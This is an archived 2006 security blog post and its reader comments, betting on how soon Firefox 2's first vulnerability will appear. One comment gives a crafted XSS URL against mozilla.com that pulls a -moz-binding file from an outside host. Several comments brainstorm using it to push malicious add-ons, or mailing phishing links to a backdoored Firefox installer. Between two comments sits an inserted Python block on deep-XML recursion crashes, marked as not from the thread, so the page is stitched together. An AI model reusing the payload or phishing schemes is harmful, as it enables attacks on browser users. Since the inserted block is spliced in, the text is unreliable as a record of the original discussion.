Monday, October 23, 2006

Place your bets on the first Firefox 2 vuln

On the heels of the Internet Explorer 7 release comes the much anticipated Firefox 2.0, officially released tomorrow. Every new major browser release brings new interest from the security research community looking for greener pastures. In IE7 the time-to-first-disclosed-vuln was under 24 hours. What do you think it'll be for FF2.0? I'll say 3 days, post your guess below.

18 comments:

  1. i'll go with 5 days.. and zero for their website

    http://www.mozilla.com/en-US/products/download.html?product=-%22%20style%3D%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%3bxx:expression(alert('XSS'))%22%3E%3Cx%20&os=1&lang=1
    (easier to just click my name)

  2. well nevermind, blogger's a pain in multiple ways.. but you get the idea..

    *points to:*
    http://sla.ckers.org/forum/read.php?3,44,2090,page=21#msg-2090

  3. Maluc, you rock...

    Using that, you can potentially load .xpi through phishing... eesh!

    I give it less than a week (and if I worked for Microsoft I'd make sure of that).

  4. Nevermind you need to find one in addons.mozilla.org or update.mozilla.org, Maluc. At least if you want to be super sneaky.

  5. heh, i'll see what i can do..

    but in the meantime, sending phishing emails advertising Firefox 2 with links to mozilla that downloads a backdoored install file could work pretty well too. That's a badly worded sentence but u get the idea..

  6. well.. i found one on addons.mozilla.org .. and persistent. But, don't the victims still need to press the install button for them to be downloaded..? Also, the .xpi files look to be hosted on releases.mozilla.org

    So it can definitely be used for phishing if they can be convinced to click install.. but i'm not sure about an automatic way

  7. less than that: http://lcamtuf.coredump.cx/ffoxdie.html

  8. The exploitable part of ffoxdie was fixed in the 1.5.0.7 release. What remains is a stack recursion crash due to an insanely deep XML tree.

    You can annoy someone, but it does not appear exploitable. https://bugzilla.mozilla.org/show_bug.cgi?id=348514

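As an added illustration (not from the post or any commenter) of the failure mode comment 8 describes, a stack recursion crash on an insanely deep XML tree, the Python below compares a naive recursive tree walk that exhausts the interpreter's stack with an iterative parse that enforces an explicit nesting limit, the usual defender-side mitigation. The nested document is constructed inline; the depth values and the limit are assumptions chosen for the demonstration.

```python
import xml.etree.ElementTree as ET
from io import BytesIO


def build_nested_xml(depth):
    """Constructed sample input: `depth` nested <a> elements and nothing else."""
    return "<a>" * depth + "</a>" * depth


def recursive_depth(elem):
    """Naive recursive walk: one stack frame per nesting level."""
    if len(elem) == 0:
        return 1
    return 1 + max(recursive_depth(child) for child in elem)


def naive_depth(xml_text):
    """Parse, then walk recursively.

    Returns the tree depth, or None when Python's recursion limit is hit,
    the interpreter-level analogue of the native stack exhaustion in the
    comment above (expat itself builds the tree iteratively, so the parse
    succeeds; it is the recursive consumer that fails).
    """
    root = ET.fromstring(xml_text)
    try:
        return recursive_depth(root)
    except RecursionError:
        return None


def max_depth_guarded(xml_bytes, limit):
    """Iterative parse with an explicit depth counter.

    Raises ValueError as soon as nesting exceeds `limit`, before the whole
    document is consumed, so a hostile input cannot drive stack usage.
    Returns the deepest nesting level seen for a document within the limit.
    """
    depth = deepest = 0
    for event, _elem in ET.iterparse(BytesIO(xml_bytes), events=("start", "end")):
        if event == "start":
            depth += 1
            if depth > limit:
                raise ValueError(f"nesting depth exceeds limit of {limit}")
            deepest = max(deepest, depth)
        else:
            depth -= 1
    return deepest


if __name__ == "__main__":
    print("shallow, naive walk:", naive_depth(build_nested_xml(20)))
    print("deep, naive walk:", naive_depth(build_nested_xml(5000)))
    print("deep, guarded parse:", max_depth_guarded(build_nested_xml(20).encode(), 100))
```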
  9. Not that that's an excuse for leaving a highly publicised crash in the browser

  10. ffoxdie also affects IE7

  11. What do you call a vuln? Do you simply mean security related bugs or must there be for example a code execution possibility?

    Regards,
    Sven

  12. 24 hours for 1st vuln disclosure
    32 hours for 1st p0c
    48 hours for 1st use of above vuln by phishers/spammers
    52 hours for 1st moan by security blog
    53 hours for 1st moan by nerd camp

    Call me old, but history repeats itself when it comes to software :0)

  13. Either is fine by me. No need to quibble over semantics.

  14. Ok, let's start with something not so difficult. I've posted in my Blog at www.disenchant.ch two ways someone can bypass the new phishing-filter very easily.

    I found these two ways in about 30 minutes so it shouldn't be such a problem to find more ways.

    PS:The first one isn't very interesting I know :P

    Regards,
    Sven

  15. It seems like there was an anomaly in my Firefox. Option 2 will not work in the way I described in my Blog. It's interesting anyway that the message which says that it's a phishing site pops up about one second later than it does if you directly navigate to the same site. Sorry for the false alarm :(
